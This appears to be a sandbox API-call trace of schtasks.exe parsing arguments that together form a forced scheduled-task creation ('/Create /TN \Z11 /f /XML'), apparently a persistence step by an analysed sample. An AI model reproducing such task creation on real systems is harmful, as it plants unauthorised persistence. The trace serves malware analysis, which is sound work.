[0219.512] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18f1d8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0219.512] VerQueryValueW (in: pBlock=0x2ec350, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18f268, puLen=0x18f258 | out: lplpBuffer=0x18f268*=0x2ec518, puLen=0x18f258) returned 1
[0219.512] lstrlenW (lpString="schtasks.exe") returned 12
[0219.512] lstrlenW (lpString="schtasks.exe") returned 12
[0219.513] lstrlenW (lpString=".EXE") returned 4
[0219.513] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0219.514] lstrlenW (lpString="schtasks.exe") returned 12
[0219.515] lstrlenW (lpString=".EXE") returned 4
[0219.515] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.515] lstrlenW (lpString="schtasks") returned 8
[0219.515] GetProcessHeap () returned 0x2d0000
[0219.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ed0
[0219.515] GetProcessHeap () returned 0x2d0000
[0219.515] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecc60
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecc90
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2eccc0
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebc00
[0219.516] _memicmp (_Buf1=0x2ebc00, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.516] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa0) returned 0x2ec180
[0219.516] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2eccf0
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd20
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd50
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebc20
[0219.517] _memicmp (_Buf1=0x2ebc20, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.517] GetProcessHeap () returned 0x2d0000
[0219.517] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x200) returned 0x2ed430
[0219.517] LoadStringW (in: hInstance=0x0, uID=0x15ed, lpBuffer=0x2ed430, cchBufferMax=256 | out: lpBuffer="Type \"%s /?\" for usage.") returned 0x17
[0219.518] lstrlenW (lpString="Type \"%s /?\" for usage.") returned 23
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x30) returned 0x2e7d40
[0219.518] _vsnwprintf (in: _Buffer=0x2ec180, _BufferCount=0x4f, _Format="Type \"%s /?\" for usage.", _ArgList=0x18f1d8 | out: _Buffer="Type \"SCHTASKS /?\" for usage.") returned 29
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] GetProcessHeap () returned 0x2d0000
[0219.518] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0219.519] GetProcessHeap () returned 0x2d0000
[0219.519] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2ec350) returned 0x74e
[0219.520] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350 | out: hHeap=0x2d0000) returned 1
[0219.520] SetLastError (dwErrCode=0x0)
[0219.520] GetThreadLocale () returned 0x409
[0219.520] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="?") returned 1
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="create") returned 6
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="delete") returned 6
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="query") returned 5
[0219.521] GetThreadLocale () returned 0x409
[0219.521] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.521] lstrlenW (lpString="change") returned 6
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="run") returned 3
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="end") returned 3
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] lstrlenW (lpString="showsid") returned 7
[0219.522] GetThreadLocale () returned 0x409
[0219.522] CompareStringA (Locale=0x409, dwCmpFlags=0x1, lpString1="PARSER2", cchCount1=-1, lpString2="PARSER2", cchCount2=-1) returned 2
[0219.522] SetLastError (dwErrCode=0x0)
[0219.522] SetLastError (dwErrCode=0x0)
[0219.522] lstrlenW (lpString="/Create") returned 7
[0219.522] lstrlenW (lpString="-/") returned 2
[0219.523] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.523] lstrlenW (lpString="?") returned 1
[0219.523] lstrlenW (lpString="?") returned 1
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec230
[0219.523] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec350
[0219.523] lstrlenW (lpString="Create") returned 6
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ec370
[0219.523] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.523] GetProcessHeap () returned 0x2d0000
[0219.523] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x14) returned 0x2ec390
[0219.524] _vsnwprintf (in: _Buffer=0x2ec350, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.524] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|Create|") returned 8
[0219.524] lstrlenW (lpString="|?|") returned 3
[0219.524] lstrlenW (lpString="|Create|") returned 8
[0219.524] SetLastError (dwErrCode=0x490)
[0219.524] lstrlenW (lpString="create") returned 6
[0219.524] lstrlenW (lpString="create") returned 6
[0219.524] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.524] GetProcessHeap () returned 0x2d0000
[0219.524] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec350) returned 1
[0219.524] GetProcessHeap () returned 0x2d0000
[0219.524] RtlReAllocateHeap (Heap=0x2d0000, Flags=0xc, Ptr=0x2ec350, Size=0x14) returned 0x2ec3b0
[0219.524] lstrlenW (lpString="Create") returned 6
[0219.525] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.525] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.525] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|Create|") returned 8
[0219.525] lstrlenW (lpString="|create|") returned 8
[0219.525] lstrlenW (lpString="|Create|") returned 8
[0219.525] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0219.567] SetLastError (dwErrCode=0x0)
[0219.574] SetLastError (dwErrCode=0x0)
[0219.616] SetLastError (dwErrCode=0x0)
[0219.652] lstrlenW (lpString="/TN") returned 3
[0219.652] lstrlenW (lpString="-/") returned 2
[0219.652] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.652] lstrlenW (lpString="?") returned 1
[0219.652] lstrlenW (lpString="?") returned 1
[0219.652] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.652] lstrlenW (lpString="TN") returned 2
[0219.652] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.652] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.652] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.652] lstrlenW (lpString="|?|") returned 3
[0219.653] lstrlenW (lpString="|TN|") returned 4
[0219.653] SetLastError (dwErrCode=0x490)
[0219.653] lstrlenW (lpString="create") returned 6
[0219.653] lstrlenW (lpString="create") returned 6
[0219.653] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.653] lstrlenW (lpString="TN") returned 2
[0219.653] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.653] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.653] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.653] lstrlenW (lpString="|create|") returned 8
[0219.653] lstrlenW (lpString="|TN|") returned 4
[0219.653] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0219.654] SetLastError (dwErrCode=0x490)
[0219.654] lstrlenW (lpString="delete") returned 6
[0219.654] lstrlenW (lpString="delete") returned 6
[0219.654] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.654] lstrlenW (lpString="TN") returned 2
[0219.654] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.654] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0219.654] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.654] lstrlenW (lpString="|delete|") returned 8
[0219.654] lstrlenW (lpString="|TN|") returned 4
[0219.654] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0219.654] SetLastError (dwErrCode=0x490)
[0219.654] lstrlenW (lpString="query") returned 5
[0219.654] lstrlenW (lpString="query") returned 5
[0219.654] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] lstrlenW (lpString="TN") returned 2
[0219.655] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
[0219.655] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.655] lstrlenW (lpString="|query|") returned 7
[0219.655] lstrlenW (lpString="|TN|") returned 4
[0219.655] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0219.655] SetLastError (dwErrCode=0x490)
[0219.655] lstrlenW (lpString="change") returned 6
[0219.655] lstrlenW (lpString="change") returned 6
[0219.655] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.655] lstrlenW (lpString="TN") returned 2
[0219.655] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0219.656] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.656] lstrlenW (lpString="|change|") returned 8
[0219.656] lstrlenW (lpString="|TN|") returned 4
[0219.656] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0219.656] SetLastError (dwErrCode=0x490)
[0219.656] lstrlenW (lpString="run") returned 3
[0219.656] lstrlenW (lpString="run") returned 3
[0219.656] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] lstrlenW (lpString="TN") returned 2
[0219.656] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.656] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0219.656] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.656] lstrlenW (lpString="|run|") returned 5
[0219.657] lstrlenW (lpString="|TN|") returned 4
[0219.657] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0219.657] SetLastError (dwErrCode=0x490)
[0219.657] lstrlenW (lpString="end") returned 3
[0219.657] lstrlenW (lpString="end") returned 3
[0219.657] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.657] lstrlenW (lpString="TN") returned 2
[0219.657] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.657] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0219.657] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.657] lstrlenW (lpString="|end|") returned 5
[0219.657] lstrlenW (lpString="|TN|") returned 4
[0219.657] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0219.657] SetLastError (dwErrCode=0x490)
[0219.658] lstrlenW (lpString="showsid") returned 7
[0219.658] lstrlenW (lpString="showsid") returned 7
[0219.658] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.658] GetProcessHeap () returned 0x2d0000
[0219.658] HeapValidate (hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec3b0) returned 1
[0219.658] GetProcessHeap () returned 0x2d0000
[0219.658] RtlReAllocateHeap (Heap=0x2d0000, Flags=0xc, Ptr=0x2ec3b0, Size=0x16) returned 0x2ec3b0
[0219.658] lstrlenW (lpString="TN") returned 2
[0219.658] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.658] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0219.658] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x5, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|TN|") returned 4
[0219.658] lstrlenW (lpString="|showsid|") returned 9
[0219.659] lstrlenW (lpString="|TN|") returned 4
[0219.659] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] lstrlenW (lpString="/TN") returned 3
[0219.659] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0219.659] SetLastError (dwErrCode=0x490)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] lstrlenW (lpString="/TN") returned 3
[0219.659] GetProcessHeap () returned 0x2d0000
[0219.659] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x8) returned 0x2ec350
[0219.659] GetProcessHeap () returned 0x2d0000
[0219.659] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecd80
[0219.659] SetLastError (dwErrCode=0x0)
[0219.659] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] lstrlenW (lpString="-/") returned 2
[0219.660] StrChrIW (lpStart="-/", wMatch=0x5c) returned 0x0
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] StrChrIW (lpStart="\\Z11", wMatch=0x3a) returned 0x0
[0219.660] SetLastError (dwErrCode=0x490)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] lstrlenW (lpString="\\Z11") returned 4
[0219.660] GetProcessHeap () returned 0x2d0000
[0219.660] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0xa) returned 0x2ec3e0
[0219.660] GetProcessHeap () returned 0x2d0000
[0219.660] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecdb0
[0219.660] SetLastError (dwErrCode=0x0)
[0219.660] SetLastError (dwErrCode=0x0)
[0219.661] lstrlenW (lpString="/f") returned 2
[0219.661] lstrlenW (lpString="-/") returned 2
[0219.661] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0219.661] lstrlenW (lpString="?") returned 1
[0219.661] lstrlenW (lpString="?") returned 1
[0219.661] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.661] lstrlenW (lpString="f") returned 1
[0219.661] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.661] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0219.661] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.661] lstrlenW (lpString="|?|") returned 3
[0219.661] lstrlenW (lpString="|f|") returned 3
[0219.662] StrStrIW (lpFirst="|?|", lpSrch="|f|") returned 0x0
[0219.662] SetLastError (dwErrCode=0x490)
[0219.662] lstrlenW (lpString="create") returned 6
[0219.662] lstrlenW (lpString="create") returned 6
[0219.662] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.662] lstrlenW (lpString="f") returned 1
[0219.662] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.662] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0219.662] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.662] lstrlenW (lpString="|create|") returned 8
[0219.662] lstrlenW (lpString="|f|") returned 3
[0219.662] StrStrIW (lpFirst="|create|", lpSrch="|f|") returned 0x0
[0219.662] SetLastError (dwErrCode=0x490)
[0219.663] lstrlenW (lpString="delete") returned 6
[0219.663] lstrlenW (lpString="delete") returned 6
[0219.663] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.663] lstrlenW (lpString="f") returned 1
[0219.663] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.663] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|delete|") returned 8
[0219.663] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.663] lstrlenW (lpString="|delete|") returned 8
[0219.663] lstrlenW (lpString="|f|") returned 3
[0219.663] StrStrIW (lpFirst="|delete|", lpSrch="|f|") returned 0x0
[0219.663] SetLastError (dwErrCode=0x490)
[0219.663] lstrlenW (lpString="query") returned 5
[0219.663] lstrlenW (lpString="query") returned 5
[0219.663] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] lstrlenW (lpString="f") returned 1
[0219.664] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x8, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|query|") returned 7
[0219.664] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.664] lstrlenW (lpString="|query|") returned 7
[0219.664] lstrlenW (lpString="|f|") returned 3
[0219.664] StrStrIW (lpFirst="|query|", lpSrch="|f|") returned 0x0
[0219.664] SetLastError (dwErrCode=0x490)
[0219.664] lstrlenW (lpString="change") returned 6
[0219.664] lstrlenW (lpString="change") returned 6
[0219.664] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.664] lstrlenW (lpString="f") returned 1
[0219.664] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.665] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|change|") returned 8
[0219.665] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.665] lstrlenW (lpString="|change|") returned 8
[0219.665] lstrlenW (lpString="|f|") returned 3
[0219.665] StrStrIW (lpFirst="|change|", lpSrch="|f|") returned 0x0
[0219.665] SetLastError (dwErrCode=0x490)
[0219.665] lstrlenW (lpString="run") returned 3
[0219.665] lstrlenW (lpString="run") returned 3
[0219.665] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.665] lstrlenW (lpString="f") returned 1
[0219.665] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.667] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|run|") returned 5
[0219.667] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0219.667] lstrlenW (lpString="|run|") returned 5
[0219.806] lstrlenW (lpString="|f|") returned 3
[0220.157] StrStrIW (lpFirst="|run|", lpSrch="|f|") returned 0x0
[0220.157] SetLastError (dwErrCode=0x490)
[0220.157] lstrlenW (lpString="end") returned 3
[0220.157] lstrlenW (lpString="end") returned 3
[0220.158] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] lstrlenW (lpString="f") returned 1
[0220.158] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|end|") returned 5
[0220.158] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0220.158] lstrlenW (lpString="|end|") returned 5
[0220.158] lstrlenW (lpString="|f|") returned 3
[0220.158] StrStrIW (lpFirst="|end|", lpSrch="|f|") returned 0x0
[0220.158] SetLastError (dwErrCode=0x490)
[0220.158] lstrlenW (lpString="showsid") returned 7
[0220.158] lstrlenW (lpString="showsid") returned 7
[0220.158] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.158] lstrlenW (lpString="f") returned 1
[0220.159] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.159] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0xa, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|showsid|") returned 9
[0220.159] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|f|") returned 3
[0220.159] lstrlenW (lpString="|showsid|") returned 9
[0220.159] lstrlenW (lpString="|f|") returned 3
[0220.159] StrStrIW (lpFirst="|showsid|", lpSrch="|f|") returned 0x0
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x0)
[0220.159] lstrlenW (lpString="/f") returned 2
[0220.159] StrChrIW (lpStart="/f", wMatch=0x3a) returned 0x0
[0220.159] SetLastError (dwErrCode=0x490)
[0220.159] SetLastError (dwErrCode=0x0)
[0220.159] lstrlenW (lpString="/f") returned 2
[0220.159] GetProcessHeap () returned 0x2d0000
[0220.159] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x6) returned 0x2ec400
[0220.160] GetProcessHeap () returned 0x2d0000
[0220.160] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2ecde0
[0220.160] SetLastError (dwErrCode=0x0)
[0220.160] SetLastError (dwErrCode=0x0)
[0220.160] lstrlenW (lpString="/XML") returned 4
[0220.160] lstrlenW (lpString="-/") returned 2
[0220.160] StrChrIW (lpStart="-/", wMatch=0x2f) returned="/"
[0220.160] lstrlenW (lpString="?") returned 1
[0220.160] lstrlenW (lpString="?") returned 1
[0220.160] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.160] lstrlenW (lpString="XML") returned 3
[0220.160] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.160] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|?|") returned 3
[0220.160] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.160] lstrlenW (lpString="|?|") returned 3
[0220.160] lstrlenW (lpString="|XML|") returned 5
[0220.161] SetLastError (dwErrCode=0x490)
[0220.161] lstrlenW (lpString="create") returned 6
[0220.161] lstrlenW (lpString="create") returned 6
[0220.161] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.161] lstrlenW (lpString="XML") returned 3
[0220.161] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.161] _vsnwprintf (in: _Buffer=0x2ec3b0, _BufferCount=0x9, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|create|") returned 8
[0220.161] _vsnwprintf (in: _Buffer=0x2ec390, _BufferCount=0x6, _Format="|%s|", _ArgList=0x18f1e8 | out: _Buffer="|XML|") returned 5
[0220.161] lstrlenW (lpString="|create|") returned 8
[0220.161] lstrlenW (lpString="|XML|") returned 5
[0220.161] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0220.161] SetLastError (dwErrCode=0x490)
[0220.161] lstrlenW (lpString="delete") returned 6
[0220.161] lstrlenW (lpString="delete") returned 6
[0220.161] _memicmp (_Buf1=0x2ec230, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0220.162] lstrlenW (lpString="XML") returned 3
[0220.162] _memicmp (_Buf1=0x2ec370, _Buf2=0xffe21b08, _Size=0x7) returned 0
